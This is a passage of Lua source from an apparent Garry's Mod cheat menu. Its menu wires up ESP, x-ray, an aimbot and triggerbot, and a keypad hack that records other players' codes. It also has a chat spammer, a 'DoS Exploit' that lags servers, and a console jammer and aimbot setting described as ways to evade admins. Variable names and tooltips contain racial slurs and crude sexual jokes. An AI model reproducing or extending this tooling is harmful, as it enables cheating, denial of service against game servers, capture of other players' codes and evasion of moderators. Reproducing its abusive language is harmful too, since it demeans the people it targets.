  945. local FLT2 = center + frt / y + lft / z + top / x; FLT2 = FLT2:ToScreen()
  946. local BRT2 = center + bak / y + rgt / z + top / x; BRT2 = BRT2:ToScreen()
  947. local BLT2 = center + bak / y + lft / z + top / x; BLT2 = BLT2:ToScreen()
  948. local FRB2 = center + frt / y + rgt / z + btm / x; FRB2 = FRB2:ToScreen()
  949. local FLB2 = center + frt / y + lft / z + btm / x; FLB2 = FLB2:ToScreen()
  950. local BRB2 = center + bak / y + rgt / z + btm / x; BRB2 = BRB2:ToScreen()
  951. local maxX = math.max( FRT.x,BLB.x,FLT.x,BRT.x,BLT.x,FRB.x,FLB.x,BRB.x )
  952. local minX = math.min( FRT.x,BLB.x,FLT.x,BRT.x,BLT.x,FRB.x,FLB.x,BRB.x )
  953. local maxY = math.max( FRT.y,BLB.y,FLT.y,BRT.y,BLT.y,FRB.y,FLB.y,BRB.y )
  954. local minY = math.min( FRT.y,BLB.y,FLT.y,BRT.y,BLT.y,FRB.y,FLB.y,BRB.y )
  955. local minYhp2 = math.min( FRT.y,BLB.y,FLT.y,BRT.y,BLT.y,FRB.y,FLB.y,BRB.y )
  956. local maxXhp = math.max( FRT3.x,BLB3.x,FLT3.x,BRT3.x,BLT3.x,FRB3.x,FLB3.x,BRB3.x )
  957. local minXhp = math.min( FRT3.x,BLB3.x,FLT3.x,BRT3.x,BLT3.x,FRB3.x,FLB3.x,BRB3.x )
  958. local maxYhp = math.max( FRT3.y,BLB3.y,FLT3.y,BRT3.y,BLT3.y,FRB3.y,FLB3.y,BRB3.y )
  959. local minYhp = math.min( FRT3.y,BLB3.y,FLT3.y,BRT3.y,BLT3.y,FRB3.y,FLB3.y,BRB3.y )
  960. local maxX2 = math.max( FRT2.x,BLB2.x,FLT2.x,BRT2.x,BLT2.x,FRB2.x,FLB2.x,BRB2.x )
  961. local minX2 = math.min( FRT2.x,BLB2.x,FLT2.x,BRT2.x,BLT2.x,FRB2.x,FLB2.x,BRB2.x )
  962. local maxY2 = math.max( FRT2.y,BLB2.y,FLT2.y,BRT2.y,BLT2.y,FRB2.y,FLB2.y,BRB2.y )
  963. local minY2 = math.min( FRT2.y,BLB2.y,FLT2.y,BRT2.y,BLT2.y,FRB2.y,FLB2.y,BRB2.y )
  964. return maxX, minX, maxY, minY, maxX2, minX2, maxY2, minY2, minYhp, maxYhp
  965. end
  967. function IsCloseEnough(ent)
  968. local dist = ent:GetPos():Distance( LocalPlayer():GetPos() )
  969. if( dist <= 50000 and ent:GetPos() != Vector( 0, 0, 0 ) ) then
  970. return true
  971. end
  972. return false
  973. end
  976. /*------------------------------------------
  977. Menu
  978. ------------------------------------------*/
  980. concommand.Add( "jav_menu", function( )
  982. local ColScheme = Color(GetConVarNumber("jav_colour_r"), GetConVarNumber("jav_colour_g"), GetConVarNumber("jav_colour_b"), 255)
  984. Menu = vgui.Create("DFrame")
  985. Menu:SetSize(800,560)
  986. Menu:SetTitle(jav_version.." :::::: Created by LegendofRobbo")
  987. Menu:Center()
  988. Menu:MakePopup()
  989. Menu.Paint = function()
  990. surface.SetDrawColor( 0, 0, 0, 200 )
  991. surface.DrawRect( 0, 0, Menu:GetWide(), Menu:GetTall() )
  992. surface.SetDrawColor( 255,150,0,255 )
  993. surface.DrawRect( 10, 50, 150, 2 )
  994. surface.SetDrawColor( 255,0,0,255 )
  995. surface.DrawRect( 10, 260, 150, 2 )
  996. surface.SetDrawColor( 0,255,150,255 )
  997. surface.DrawRect( 440, 50, 150, 2 )
  998. surface.SetDrawColor( 0,150,255,255 )
  999. surface.DrawRect( 440, 200, 150, 2 )
  1000. surface.SetDrawColor( 150,255,0,255 )
  1001. surface.DrawRect( 440, 400, 150, 2 )
  1002. surface.SetDrawColor( GColScheme )
  1003. surface.DrawOutlinedRect( 0, 0, Menu:GetWide(), Menu:GetTall() )
  1005. end
  1007. local ESPenable = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1008. ESPenable:SetPos( 10, 30 )
  1009. ESPenable:SetParent(Menu)
  1010. ESPenable:SetValue( 0 )
  1011. ESPenable:SetText( "ESP Enabled" )
  1012. ESPenable:SetConVar( "jav_esp_enabled" )
  1013. ESPenable:SetToolTip( "see players positions and other relevant info" )
  1014. ESPenable:SizeToContents()
  1016. local Xraydistlabel = vgui.Create( "DLabel", Panel )
  1017. Xraydistlabel:SetParent(Menu)
  1018. Xraydistlabel:SetPos( 115, 180 )
  1019. Xraydistlabel:SetText( "Range (Metres):" )
  1020. Xraydistlabel:SizeToContents()
  1022. local ESPdistlabel = vgui.Create( "DLabel", Panel )
  1023. ESPdistlabel:SetParent(Menu)
  1024. ESPdistlabel:SetPos( 115, 30 )
  1025. ESPdistlabel:SetText( "Range (Metres):" )
  1026. ESPdistlabel:SizeToContents()
  1028. local ABangle = vgui.Create( "DLabel", Panel )
  1029. ABangle:SetParent(Menu)
  1030. ABangle:SetPos( 135, 270 )
  1031. ABangle:SetText( "Max Snap Angle:" )
  1032. ABangle:SizeToContents()
  1034. local ABgrace = vgui.Create( "DLabel", Panel )
  1035. ABgrace:SetParent(Menu)
  1036. ABgrace:SetPos( 165, 350 )
  1037. ABgrace:SetText( "Grace Time:" )
  1038. ABgrace:SizeToContents()
  1040. local ABauto = vgui.Create( "DLabel", Panel )
  1041. ABauto:SetParent(Menu)
  1042. ABauto:SetPos( 10, 390 )
  1043. ABauto:SetText( "Auto Shoot Max Distance:" )
  1044. ABauto:SizeToContents()
  1046. local ABanglebox = vgui.Create( "DNumberWang" )// Create the checkbox
  1047. ABanglebox:SetPos( 220, 266 )
  1048. ABanglebox:SetParent(Menu)
  1049. ABanglebox:SetMin(0)
  1050. ABanglebox:SetMax(90)
  1051. ABanglebox:SetConVar( "jav_aa_angle" )
  1052. ABanglebox:SetToolTip( "how far the aimbot can snap from the cursor in degrees, smaller values make it harder for spectating admins to detect your hax" )
  1054. local ABgracebox = vgui.Create( "DNumberWang" )// Create the checkbox
  1055. ABgracebox:SetPos( 225, 346 )
  1056. ABgracebox:SetParent(Menu)
  1057. ABgracebox:SetMin(0)
  1058. ABgracebox:SetMax(20)
  1059. ABgracebox:SetConVar( "jav_aa_snaponaimgrace" )
  1060. ABgracebox:SetToolTip( "how long you will remain snapped after aiming/right clicking (in seconds)" )
  1062. local ABautobox = vgui.Create( "DNumberWang" )// Create the checkbox
  1063. ABautobox:SetPos( 140, 386 )
  1064. ABautobox:SetParent(Menu)
  1065. ABautobox:SetMin(0)
  1066. ABautobox:SetMax(10000)
  1067. ABautobox:SetConVar( "jav_aa_autoshoot" )
  1068. ABautobox:SetToolTip( "the maximum distance in metres that the hack will automatically shoot for you at (set to 0 to disable autoshoot)" )
  1070. local EntFbutton = vgui.Create( "DButton" )
  1071. EntFbutton:SetParent( Menu )
  1072. EntFbutton:SetPos( 10, 180 )
  1073. EntFbutton:SetTextColor( Color(255, 255, 255, 255) )
  1074. EntFbutton:SetSize( 90, 15 )
  1075. EntFbutton:SetToolTip( "Turn the x-ray on, it helps a lot when propkilling" )
  1076. EntFbutton.Paint = function()
  1077. surface.SetDrawColor( 90, 60, 0, 200 )
  1078. EntFbutton:SetText( "Toggle X-ray" )
  1079. surface.DrawRect( 0, 0, EntFbutton:GetWide(), EntFbutton:GetTall() )
  1080. surface.SetDrawColor( 0, 0, 0, 255 )
  1081. surface.DrawOutlinedRect( 0, 0, EntFbutton:GetWide(), EntFbutton:GetTall() , 2)
  1082. end
  1083. EntFbutton.DoClick = function()
  1084. RunConsoleCommand("jav_xray_toggle")
  1085. end
  1087. local Xraymaxdist = vgui.Create( "DNumberWang" )// Create the checkbox
  1088. Xraymaxdist:SetPos( 200, 176 )
  1089. Xraymaxdist:SetParent(Menu)
  1090. Xraymaxdist:SetMin(0)
  1091. Xraymaxdist:SetMax(10000)
  1092. Xraymaxdist:SetConVar( "jav_xray_distance" )
  1093. Xraymaxdist:SetToolTip( "sets the range of your xray vision in metres" )
  1095. local ESPmaxdist = vgui.Create( "DNumberWang" )// Create the checkbox
  1096. ESPmaxdist:SetPos( 200, 26 )
  1097. ESPmaxdist:SetParent(Menu)
  1098. ESPmaxdist:SetMin(0)
  1099. ESPmaxdist:SetMax(10000)
  1100. ESPmaxdist:SetConVar( "jav_esp_distance" )
  1101. ESPmaxdist:SetToolTip( "sets the range of the esp in metres, crank this down if you are getting fps lag from the hack" )
  1103. local ESPposition = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1104. ESPposition:SetPos( 10, 60 )
  1105. ESPposition:SetParent(Menu)
  1106. ESPposition:SetValue( 0 )
  1107. ESPposition:SetText( "Show Position" )
  1108. ESPposition:SetConVar( "jav_esp_position" )
  1109. ESPposition:SetToolTip( "isn't this y'know, the whole point of using an esp?" )
  1110. ESPposition:SizeToContents()
  1112. local ESPname = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1113. ESPname:SetPos( 10, 80 )
  1114. ESPname:SetParent(Menu)
  1115. ESPname:SetValue( 0 )
  1116. ESPname:SetText( "Show Name" )
  1117. ESPname:SetConVar( "jav_esp_names" )
  1118. ESPname:SetToolTip( "shows player names, the name will also be coloured to match their team colour" )
  1119. ESPname:SizeToContents()
  1121. local ESPdist = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1122. ESPdist:SetPos( 10, 100 )
  1123. ESPdist:SetParent(Menu)
  1124. ESPdist:SetValue( 0 )
  1125. ESPdist:SetText( "Show Distance" )
  1126. ESPdist:SetToolTip( "shows distance to players in metres" )
  1127. ESPdist:SetConVar( "jav_esp_showtargetdistance" )
  1128. ESPdist:SizeToContents()
  1130. local ESPvel = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1131. ESPvel:SetPos( 10, 120 )
  1132. ESPvel:SetParent(Menu)
  1133. ESPvel:SetValue( 0 )
  1134. ESPvel:SetText( "Show Velocity" )
  1135. ESPvel:SetConVar( "jav_esp_velocity" )
  1136. ESPvel:SetToolTip( "shows the targets velocity (WIP!)" )
  1137. ESPvel:SizeToContents()
  1139. local ESPadmin = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1140. ESPadmin:SetPos( 10, 140 )
  1141. ESPadmin:SetParent(Menu)
  1142. ESPadmin:SetValue( 0 )
  1143. ESPadmin:SetText( "Show Custom Ranks" )
  1144. ESPadmin:SetConVar( "jav_esp_admin" )
  1145. ESPadmin:SetToolTip( "detect any admins or custom ranks that are on the server" )
  1146. ESPadmin:SizeToContents()
  1148. local ESPbox = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1149. ESPbox:SetPos( 10, 160 )
  1150. ESPbox:SetParent(Menu)
  1151. ESPbox:SetValue( 0 )
  1152. ESPbox:SetText( "Show Bounding Box" )
  1153. ESPbox:SetConVar( "jav_esp_box" )
  1154. ESPbox:SetToolTip( "shows a box around the player so you can accurately guage their position" )
  1155. ESPbox:SizeToContents()
  1157. local Scannerenabled = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1158. Scannerenabled:SetPos( 10, 200 )
  1159. Scannerenabled:SetParent(Menu)
  1160. Scannerenabled:SetValue( 0 )
  1161. Scannerenabled:SetText( "Enable Entity Scanner" )
  1162. Scannerenabled:SetConVar( "jav_scanner_enabled" )
  1163. Scannerenabled:SetToolTip( "gives advanced info on the entity you are looking at" )
  1164. Scannerenabled:SizeToContents()
  1166. local Budgetenabled = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1167. Budgetenabled:SetPos( 10, 220 )
  1168. Budgetenabled:SetParent(Menu)
  1169. Budgetenabled:SetValue( 0 )
  1170. Budgetenabled:SetText( "Budget Mode" )
  1171. Budgetenabled:SetConVar( "jav_esp_budget" )
  1172. Budgetenabled:SetToolTip( "turn this on if you have a shit pc and the esp makes you lag" )
  1173. Budgetenabled:SizeToContents()
  1175. local Misclabel = vgui.Create( "DLabel", Panel )
  1176. Misclabel:SetParent(Menu)
  1177. Misclabel:SetPos( 465, 30 )
  1178. Misclabel:SetText( "Miscellaneous Tools" )
  1179. Misclabel:SizeToContents()
  1181. local Bhopenable = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1182. Bhopenable:SetPos( 425, 60 )
  1183. Bhopenable:SetParent(Menu)
  1184. Bhopenable:SetValue( 0 )
  1185. Bhopenable:SetText( "Enable Bhop" )
  1186. Bhopenable:SetConVar( "jav_bhop_enabled" )
  1187. Bhopenable:SetToolTip( "hold space to bounce around like yo mummas ass when shes riding a huge black cock" )
  1188. Bhopenable:SizeToContents()
  1190. local niggers = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1191. niggers:SetPos( 425, 430 )
  1192. niggers:SetParent(Menu)
  1193. niggers:SetValue( 0 )
  1194. niggers:SetText( "Auto Click" )
  1195. niggers:SetConVar( "jav_autoclick_enabled" )
  1196. niggers:SetToolTip( "turn this on for rope spamming and lulz" )
  1197. niggers:SizeToContents()
  1199. local Mirrorenable = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1200. Mirrorenable:SetPos( 425, 80 )
  1201. Mirrorenable:SetParent(Menu)
  1202. Mirrorenable:SetValue( 0 )
  1203. Mirrorenable:SetText( "Enable Mirror" )
  1204. Mirrorenable:SetConVar( "jav_mirror_enabled" )
  1205. Mirrorenable:SetToolTip( "enables the rear vision mirror so people cant sneak up on you and fuck you in the ass" )
  1206. Mirrorenable:SizeToContents()
  1208. local Crossenable = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1209. Crossenable:SetPos( 425, 100 )
  1210. Crossenable:SetParent(Menu)
  1211. Crossenable:SetValue( 0 )
  1212. Crossenable:SetText( "Enable Crosshair" )
  1213. Crossenable:SetConVar( "jav_crosshair_enabled" )
  1214. Crossenable:SetToolTip( "draws a nice circular crosshair" )
  1215. Crossenable:SizeToContents()
  1217. local Flashlightenable = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1218. Flashlightenable:SetPos( 425, 120 )
  1219. Flashlightenable:SetParent(Menu)
  1220. Flashlightenable:SetValue( 0 )
  1221. Flashlightenable:SetText( "Enable Flashlight Spam" )
  1222. Flashlightenable:SetConVar( "jav_flashlight_enabled" )
  1223. Flashlightenable:SetToolTip( "rave party!" )
  1224. Flashlightenable:SizeToContents()
  1226. local Nightvisenable = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1227. Nightvisenable:SetPos( 425, 140 )
  1228. Nightvisenable:SetParent(Menu)
  1229. Nightvisenable:SetValue( 0 )
  1230. Nightvisenable:SetText( "Enable Night Vision" )
  1231. Nightvisenable:SetConVar( "mat_fullbright" )
  1232. Nightvisenable:SetToolTip( "requires sv_cheats bypasser" )
  1233. Nightvisenable:SizeToContents()
  1235. local Witnessenable = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1236. Witnessenable:SetPos( 425, 160 )
  1237. Witnessenable:SetParent(Menu)
  1238. Witnessenable:SetValue( 0 )
  1239. Witnessenable:SetText( "Enable Witness Detection" )
  1240. Witnessenable:SetConVar( "jav_witness_enabled" )
  1241. Witnessenable:SetToolTip( "allows you to see if anybody else can see you, useful for stealthy trolling" )
  1242. Witnessenable:SizeToContents()
  1244. local Tbotenable = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1245. Tbotenable:SetPos( 425, 410 )
  1246. Tbotenable:SetParent(Menu)
  1247. Tbotenable:SetValue( 0 )
  1248. Tbotenable:SetText( "Enable Triggerbot" )
  1249. Tbotenable:SetConVar( "jav_triggerbot_enabled" )
  1250. Tbotenable:SetToolTip( "activate the triggerbot (fires your gun automatically when you look at somebody)" )
  1251. Tbotenable:SizeToContents()
  1253. local glabel = vgui.Create( "DLabel", Panel )
  1254. glabel:SetParent(Menu)
  1255. glabel:SetPos( 460, 180 )
  1256. glabel:SetText( "More Misc Tools" )
  1257. glabel:SizeToContents()
  1259. local Murderenable = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1260. Murderenable:SetPos( 425, 210 )
  1261. Murderenable:SetParent(Menu)
  1262. Murderenable:SetValue( 0 )
  1263. Murderenable:SetText( "Enable Murder Hack (broken)" )
  1264. Murderenable:SetConVar( "jav_murderhax" )
  1265. Murderenable:SetToolTip( "a special esp for the gamemode 'murder', tells you where all the murderers, gun holders and loot items are at" )
  1266. Murderenable:SizeToContents()
  1268. local TTTenable = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1269. TTTenable:SetPos( 425, 230 )
  1270. TTTenable:SetParent(Menu)
  1271. TTTenable:SetValue( 0 )
  1272. TTTenable:SetText( "Enable TTT Hack" )
  1273. TTTenable:SetConVar( "jav_ttthax" )
  1274. TTTenable:SetToolTip( "no traitor scum will be able to hide their presence from you with this hack turned on" )
  1275. TTTenable:SizeToContents()
  1277. local keypadbutton = vgui.Create( "DCheckBoxLabel" )
  1278. keypadbutton:SetPos( 425, 250 )
  1279. keypadbutton:SetParent(Menu)
  1280. keypadbutton:SetValue( 0 )
  1281. keypadbutton:SetText( "Enable DarkRP Keypad Hack" )
  1282. keypadbutton:SetConVar( "jav_keypadhax" )
  1283. keypadbutton:SetToolTip( "Waltz right into peoples bases using this useful little hack, works by saving down the correct key code as soon as anybody on the server types it into that keypad" )
  1284. keypadbutton:SizeToContents()
  1286. local glabel = vgui.Create( "DLabel", Panel )
  1287. glabel:SetParent(Menu)
  1288. glabel:SetPos( 470, 380 )
  1289. glabel:SetText( "Legacy/Experimental" )
  1290. glabel:SizeToContents()
  1292. local ABlabel = vgui.Create( "DLabel", Panel )
  1293. ABlabel:SetParent(Menu)
  1294. ABlabel:SetPos( 50, 240 )
  1295. ABlabel:SetText( "Aimbot Options" )
  1296. ABlabel:SizeToContents()
  1298. local ABenable = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1299. ABenable:SetPos( 10, 270 )
  1300. ABenable:SetParent(Menu)
  1301. ABenable:SetValue( 0 )
  1302. ABenable:SetText( "Aimbot Enabled" )
  1303. ABenable:SetConVar( "jav_autoaim_enabled" )
  1304. ABenable:SetToolTip( "why aim when you can let this handy little script do all the work for you" )
  1305. ABenable:SizeToContents()
  1307. local ABfriends = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1308. ABfriends:SetPos( 10, 290 )
  1309. ABfriends:SetParent(Menu)
  1310. ABfriends:SetValue( 0 )
  1311. ABfriends:SetText( "Target Steam Friends" )
  1312. ABfriends:SetConVar( "jav_aa_targetfriends" )
  1313. ABfriends:SetToolTip( "turn this off to protect your buddies from your script fuelled wrath" )
  1314. ABfriends:SizeToContents()
  1316. local ABteam = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1317. ABteam:SetPos( 10, 310 )
  1318. ABteam:SetParent(Menu)
  1319. ABteam:SetValue( 0 )
  1320. ABteam:SetText( "Target Teammates" )
  1321. ABteam:SetConVar( "jav_aa_targetteam" )
  1322. ABteam:SetToolTip( "turn this off if you don't want to be a team killing bastard" )
  1323. ABteam:SizeToContents()
  1325. local ABheads = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1326. ABheads:SetPos( 10, 330 )
  1327. ABheads:SetParent(Menu)
  1328. ABheads:SetValue( 0 )
  1329. ABheads:SetText( "Headshot Mode" )
  1330. ABheads:SetConVar( "jav_aa_headshot" )
  1331. ABheads:SetToolTip( "turn this on to always target enemy heads, turn it off to target their centre of mass" )
  1332. ABheads:SizeToContents()
  1334. local ABsnaponaim = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1335. ABsnaponaim:SetPos( 10, 350 )
  1336. ABsnaponaim:SetParent(Menu)
  1337. ABsnaponaim:SetValue( 0 )
  1338. ABsnaponaim:SetText( "Only Snap When Aiming" )
  1339. ABsnaponaim:SetConVar( "jav_aa_snaponaim" )
  1340. ABsnaponaim:SetToolTip( "makes it so the aimbot only snaps when aiming (right mouse is pressed)" )
  1341. ABsnaponaim:SizeToContents()
  1343. local RadarBox = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1344. RadarBox:SetPos( 425, 330 )
  1345. RadarBox:SetParent(Menu)
  1346. RadarBox:SetValue( 0 )
  1347. RadarBox:SetText( "Enable Radar" )
  1348. RadarBox:SetConVar( "jav_radar_enabled" )
  1349. RadarBox:SetToolTip( "turn the radar on and off" )
  1350. RadarBox:SizeToContents()
  1352. local LElabel = vgui.Create( "DLabel", Panel )
  1353. LElabel:SetParent(Menu)
  1354. LElabel:SetPos( 595, 315 )
  1355. LElabel:SetText( "Radar Size:" )
  1356. LElabel:SizeToContents()
  1358. local LElabel = vgui.Create( "DLabel", Panel )
  1359. LElabel:SetParent(Menu)
  1360. LElabel:SetPos( 665, 315 )
  1361. LElabel:SetText( "Radar FOV:" )
  1362. LElabel:SizeToContents()
  1364. local RadarSize = vgui.Create( "DNumberWang" )// Create the checkbox
  1365. RadarSize:SetPos( 595, 330 )
  1366. RadarSize:SetParent(Menu)
  1367. RadarSize:SetMin(0)
  1368. RadarSize:SetMax(2000)
  1369. RadarSize:SetConVar( "jav_radar_size" )
  1370. RadarSize:SetToolTip( "Controls the onscreen size of your radar" )
  1372. local RadarFOV = vgui.Create( "DNumberWang" )// Create the checkbox
  1373. RadarFOV:SetPos( 665, 330 )
  1374. RadarFOV:SetParent(Menu)
  1375. RadarFOV:SetMin(0)
  1376. RadarFOV:SetMax(200)
  1377. RadarFOV:SetConVar( "jav_radar_fov" )
  1378. RadarFOV:SetToolTip( "Controls the field of vision of your radar, bigger numbers means your radar will extend further but close targets may appear too bunched up on high fov" )
  1380. local ABignorewalls = vgui.Create( "DCheckBoxLabel" )// Create the checkbox
  1381. ABignorewalls:SetPos( 10, 370 )
  1382. ABignorewalls:SetParent(Menu)
  1383. ABignorewalls:SetValue( 0 )
  1384. ABignorewalls:SetText( "Ignore Walls" )
  1385. ABignorewalls:SetConVar( "jav_aa_ignorewalls" )
  1386. ABignorewalls:SetToolTip( "whether or not the aimbot can target people through walls" )
  1387. ABignorewalls:SizeToContents()
  1389. local EntFbutton = vgui.Create( "DButton" )
  1390. EntFbutton:SetParent( Menu )
  1391. EntFbutton:SetPos( 425, 270 )
  1392. EntFbutton:SetTextColor( Color(255, 255, 255, 255) )
  1393. EntFbutton:SetSize( 160, 15 )
  1394. EntFbutton:SetToolTip( "Toggle this to spam 5 dollar notes everywhere" )
  1395. EntFbutton.Paint = function()
  1396. surface.SetDrawColor( 0, 60, 0, 200 )
  1397. EntFbutton:SetText( "Vomit Cash (DarkRP)" )
  1398. surface.DrawRect( 0, 0, EntFbutton:GetWide(), EntFbutton:GetTall() )
  1399. surface.SetDrawColor( 0, 0, 0, 255 )
  1400. surface.DrawOutlinedRect( 0, 0, EntFbutton:GetWide(), EntFbutton:GetTall() , 2)
  1401. end
  1402. EntFbutton.DoClick = function()
  1403. RunConsoleCommand("jav_vomitcash")
  1404. end
  1406. local EntFbutton = vgui.Create( "DButton" )
  1407. EntFbutton:SetParent( Menu )
  1408. EntFbutton:SetPos( 425, 290 )
  1409. EntFbutton:SetTextColor( Color(255, 255, 255, 255) )
  1410. EntFbutton:SetSize( 160, 15 )
  1411. EntFbutton:SetToolTip( "Toggle this to shit up chat" )
  1412. EntFbutton.Paint = function()
  1413. surface.SetDrawColor( 90, 60, 0, 200 )
  1414. EntFbutton:SetText( "Chat Spammer" )
  1415. surface.DrawRect( 0, 0, EntFbutton:GetWide(), EntFbutton:GetTall() )
  1416. surface.SetDrawColor( 0, 0, 0, 255 )
  1417. surface.DrawOutlinedRect( 0, 0, EntFbutton:GetWide(), EntFbutton:GetTall() , 2)
  1418. end
  1419. EntFbutton.DoClick = function()
  1420. RunConsoleCommand("jav_chatspam")
  1421. end
  1423. local EntFbutton = vgui.Create( "DButton" )
  1424. EntFbutton:SetParent( Menu )
  1425. EntFbutton:SetPos( 425, 310 )
  1426. EntFbutton:SetTextColor( Color(255, 255, 255, 255) )
  1427. EntFbutton:SetSize( 160, 15 )
  1428. EntFbutton:SetToolTip( "Spin around like a spastic, will not work when the aimbot is activated" )
  1429. EntFbutton.Paint = function()
  1430. surface.SetDrawColor( 90, 90, 0, 200 )
  1431. EntFbutton:SetText( "Spinbot" )
  1432. surface.DrawRect( 0, 0, EntFbutton:GetWide(), EntFbutton:GetTall() )
  1433. surface.SetDrawColor( 0, 0, 0, 255 )
  1434. surface.DrawOutlinedRect( 0, 0, EntFbutton:GetWide(), EntFbutton:GetTall() , 2)
  1435. end
  1436. EntFbutton.DoClick = function()
  1437. RunConsoleCommand("jav_spinbot")
  1438. end
  1440. local TextEntry = vgui.Create( "DTextEntry", Menu )
  1441. TextEntry:SetPos( 595, 285 )
  1442. TextEntry:SetSize( 195, 25 )
  1443. TextEntry:SetText( GetConVarString("jav_chatspam_msg") )
  1444. TextEntry.OnEnter = function( self )
  1445. LocalPlayer():ConCommand("jav_chatspam_msg "..self:GetValue())
  1446. end
  1448. local LElabel = vgui.Create( "DLabel", Panel )
  1449. LElabel:SetParent(Menu)
  1450. LElabel:SetPos( 595, 265 )
  1451. LElabel:SetText( "Chat Spam Message:" )
  1452. LElabel:SizeToContents()
  1454. local SWbutton = vgui.Create( "DButton" )
  1455. SWbutton:SetParent( Menu )
  1456. SWbutton:SetPos( 10, 520 )
  1457. SWbutton:SetTextColor( Color(255, 255, 255, 255) )
  1458. SWbutton:SetSize( 110, 25 )
  1459. SWbutton:SetToolTip( "leave your body as an invisible ghost and fulfil all your voyeuristic fantasies" )
  1460. SWbutton.Paint = function()
  1461. surface.SetDrawColor( 60, 0, 60, 200 )
  1462. SWbutton:SetText( "Toggle Spirit Walk" )
  1463. surface.DrawRect( 0, 0, SWbutton:GetWide(), SWbutton:GetTall() )
  1464. end
  1465. SWbutton.DoClick = function() RunConsoleCommand("jav_spiritwalk") end
  1467. local Namebutton = vgui.Create( "DButton" )
  1468. Namebutton:SetParent( Menu )
  1469. Namebutton:SetPos( 130, 520 )
  1470. Namebutton:SetTextColor( Color(255, 255, 255, 255) )
  1471. Namebutton:SetSize( 110, 25 )
  1472. Namebutton:SetToolTip( "randomly change your RPname in darkrp to confuse people" )
  1473. Namebutton.Paint = function()
  1474. surface.SetDrawColor( 0, 60, 60, 200 )
  1475. Namebutton:SetText( "Randomize RPname" )
  1476. surface.DrawRect( 0, 0, Namebutton:GetWide(), Namebutton:GetTall() )
  1477. end
  1478. Namebutton.DoClick = function() RunConsoleCommand("jav_newname") end
  1480. local EntFbutton = vgui.Create( "DButton" )
  1481. EntFbutton:SetParent( Menu )
  1482. EntFbutton:SetPos( 250, 520 )
  1483. EntFbutton:SetTextColor( Color(255, 255, 255, 255) )
  1484. EntFbutton:SetSize( 110, 25 )
  1485. EntFbutton:SetToolTip( "Go to the entity finder menu" )
  1486. EntFbutton.Paint = function()
  1487. surface.SetDrawColor( 60, 60, 0, 200 )
  1488. EntFbutton:SetText( "Entity Finder ESP" )
  1489. surface.DrawRect( 0, 0, EntFbutton:GetWide(), EntFbutton:GetTall() )
  1490. end
  1491. EntFbutton.DoClick = function()
  1492. RunConsoleCommand("jav_entfinder_menu")
  1493. Menu:Remove()
  1494. end
  1496. local Lagsploitbutton = vgui.Create( "DButton" )
  1497. Lagsploitbutton:SetParent( Menu )
  1498. Lagsploitbutton:SetPos( 370, 520 )
  1499. Lagsploitbutton:SetTextColor( Color(255, 255, 255, 255) )
  1500. Lagsploitbutton:SetSize( 110, 25 )
  1501. Lagsploitbutton:SetToolTip( "An ingame DoS attack, will cause significant lag on any server running sandbox or a sandbox derived gamemode (AKA most gamemodes except TTT). Multiple people firing this at once will cause even more lag." )
  1502. Lagsploitbutton.Paint = function()
  1503. surface.SetDrawColor( 60, 0, 0, 200 )
  1504. Lagsploitbutton:SetText( "DoS Exploit" )
  1505. surface.DrawRect( 0, 0, Lagsploitbutton:GetWide(), Lagsploitbutton:GetTall() )
  1506. end
  1507. Lagsploitbutton.DoClick = function() if GetConVarNumber("jav_lagsploit") == 0 then LocalPlayer():ConCommand("jav_lagsploit 1") elseif GetConVarNumber("jav_lagsploit") == 1 then LocalPlayer():ConCommand("jav_lagsploit 0") end end
  1509. local JamButton = vgui.Create( "DButton" )
  1510. JamButton:SetParent( Menu )
  1511. JamButton:SetPos( 620, 520 )
  1512. JamButton:SetTextColor( Color(255, 255, 255, 255) )
  1513. JamButton:SetSize( 110, 25 )
  1514. JamButton:SetToolTip( "Floods the console with garbage making it impossible for admins to tell whats going on" )
  1515. JamButton.Paint = function()
  1516. surface.SetDrawColor( 0, 0, 60, 200 )
  1517. JamButton:SetText( "Console Jammer" )
  1518. surface.DrawRect( 0, 0, JamButton:GetWide(), JamButton:GetTall() )
  1519. end
  1520. JamButton.DoClick = function() LocalPlayer():ConCommand("jav_console_jammer") end
  1522. local LElabel = vgui.Create( "DLabel", Panel )
  1523. LElabel:SetParent(Menu)
  1524. LElabel:SetPos( 485, 523 )
  1525. LElabel:SetText( "DoS Power:" )
  1526. LElabel:SizeToContents()
  1528. local Lagsploitbox = vgui.Create( "DNumberWang" )// Create the checkbox
  1529. Lagsploitbox:SetPos( 545, 520 )
  1530. Lagsploitbox:SetParent(Menu)
  1531. Lagsploitbox:SetMin(0)
  1532. Lagsploitbox:SetMax(1000)
  1533. Lagsploitbox:SetConVar( "jav_lagsploit_power" )
  1534. Lagsploitbox:SetToolTip( "How powerful your lagsploit is in percentage (Default is 80%). This option is kind of redundant with the new lagsploit but i left it in anyway" )
  1536. local nigger = vgui.Create( "DLabel", Menu )
  1537. nigger:SetParent(Menu)
  1538. nigger:SetPos( 595, 30 )
  1539. nigger:SetText( "Colour Scheme" )
  1540. nigger:SizeToContents()
  1542. Mixer = vgui.Create( "DColorMixer", Menu )
  1543. --Mixer:Dock( FILL ) --Make Mixer fill place of Frame
  1544. Mixer:SetPos(595,50)
  1545. Mixer:SetSize(200,200)
  1546. Mixer:SetPalette( true ) --Show/hide the palette DEF:true
